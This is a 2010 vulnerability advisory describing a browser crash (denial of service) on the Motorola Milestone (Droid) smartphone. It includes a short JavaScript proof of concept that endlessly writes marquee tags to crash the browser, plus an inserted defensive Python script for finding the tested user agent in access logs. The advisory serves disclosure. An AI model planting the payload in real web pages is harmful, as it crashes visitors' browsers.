SecurityReason.com - Our Reason is Security

Topic: Motorola Milestone(Droid) Smartphone Remote Denial of Service

WLB: WLB-2010020038
SecurityAlert: None
Date: 2010-02-08
Credit: David Vieira-Kurz
Added by: SecurityReason
SecurityRisk: Medium
Remote: Yes
Local: No
Status: Bug
History: [2010-02-08] Started
Affected software: Motorola Milestone(Droid)

Text:

[MajorSecurity Advisory #65]Motorola Milestone(Droid) Smartphone Remote
Denial of Service

Details
============
Product: Motorola Milestone(Droid) Smartphone
Security-Risk: low
Remote-Exploit: yes
Vendor-URL:
http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Services/Mobile-Phones/Motorola-DROID-US-EN?localeId=33
Vendor-Status: informed
Advisory-Status: published on 02-02-2010

Credits
============
Discovered by: David Vieira-Kurz
http://www.majorsecurity.info

Affected Products:
============
Motorola Milestone(Droid) smartphone browser with the following user agent:
Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone
Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0
Mobile Safari/530.17

Original Advisory:
============
http://www.majorsecurity.info/index_2.php?adv=major_rls65

Introduction
============
The Motorola Milestone(Droid) is a smartphone produced by Motorola based on
the Android operating system.

More Details
============
A remotely exploitable vulnerability has been found in the JavaScript
engine of the MobileSafari browser (based on the WebKit engine) used on the
Motorola Milestone(Droid) smartphone.
In detail, the following flaw was determined:
The Motorola Milestone(Droid) is prone to a denial of service vulnerability
when parsing certain HTML content. This is possible due to a failure in
handling exceptional conditions. The issue is caused by a memory
corruption error when handling JavaScript elements, which could be
exploited by remote attackers to crash the browser by tricking a user into
visiting a specially crafted web page. This issue can NOT lead to remote
code execution, so the potential security risk is rated low.

The exploit has been tested on a Motorola Milestone(Droid) using the
following user agent:

Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone
Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0
Mobile Safari/530.17
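
For fleet triage, the user agent above can be matched against web or proxy access logs to find clients running the tested build. This is an added example, not part of the original advisory; the Combined Log Format input, the "same-engine" category, the sample log lines and all function names are assumptions.

```python
import re

# User agent the advisory reports as tested (copied from the advisory).
TESTED_UA = ("Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone "
             "Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) "
             "Version/4.0 Mobile Safari/530.17")
# Combined Log Format (assumed): client address first, user agent in last quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*"(?P<ua>[^"]*)"\s*$')
UA_RE = re.compile(
    r"Android (?P<android>[\d.]+); (?:[A-Za-z]{2}-[A-Za-z]{2}; )?"
    r"(?P<model>[^;)]+?) Build/(?P<build>[^;)\s]+)\).*?"
    r"AppleWebKit/(?P<webkit>[\d.]+)")

def parse_ua(ua):
    """Return Android version, model, build and WebKit version, or None."""
    m = UA_RE.search(ua)
    return m.groupdict() if m else None

TESTED = parse_ua(TESTED_UA)

def classify(ua):
    """'tested' = advisory's model/build/engine (locale ignored); 'same-engine'
    = same Android and WebKit on an untested build (assumption); else 'other'."""
    f = parse_ua(ua)
    if f == TESTED:
        return "tested"
    if f and (f["android"], f["webkit"]) == (TESTED["android"], TESTED["webkit"]):
        return "same-engine"
    return "other"

def triage(log_lines):
    """Map client address -> strongest match seen; non-matches are omitted."""
    rank = {"other": 0, "same-engine": 1, "tested": 2}
    seen = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            c = classify(m["ua"])
            if rank[c] > rank[seen.get(m["ip"], "other")]:
                seen[m["ip"]] = c
    return seen

# Constructed sample log lines (documentation addresses, made-up build id).
REQ = ' - - [08/Feb/2010:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "'
SAMPLE_LOG = [
    "192.0.2.10" + REQ + TESTED_UA.replace("de-de", "en-gb") + '"',
    "192.0.2.11" + REQ + TESTED_UA.replace("SHOLS_U2_01.03.1", "EXAMPLE_BUILD") + '"',
    "192.0.2.12" + REQ + 'Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"',
]
```

User agents are client-supplied and easy to change, so a match is an inventory hint rather than proof that a device is affected.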

Proof of Concept:
============
<script>
var overloadtag = "<marquee>";
for(x=1;x<=9999999999999;x++){
document.write(overloadtag);
}
</script>

MajorSecurity
================
MajorSecurity is a German penetration testing and security research company
which focuses on web application security. We offer professional
penetration tests, security audits, source code reviews and reliable
proofs of concept. You will find more information about MajorSecurity at
http://www.majorsecurity.info/

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
office@majorsecurity.info for permission.
Use of the advisory constitutes acceptance for use in an "as is"
condition. All warranties are excluded.
In no event shall majorsecurity and David Vieira-Kurz IT Security Services
be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages,
even if majorsecurity has been advised of the possibility of such damages.

Copyright 2010 MajorSecurity and David Vieira-Kurz IT Security Services.
All rights reserved. Terms of use apply.

--
David Vieira-Kurz IT Security Services
Tel: 0151 24 132 139
http://www.penetrationstest.net | http://www.sichereprogrammierung.de

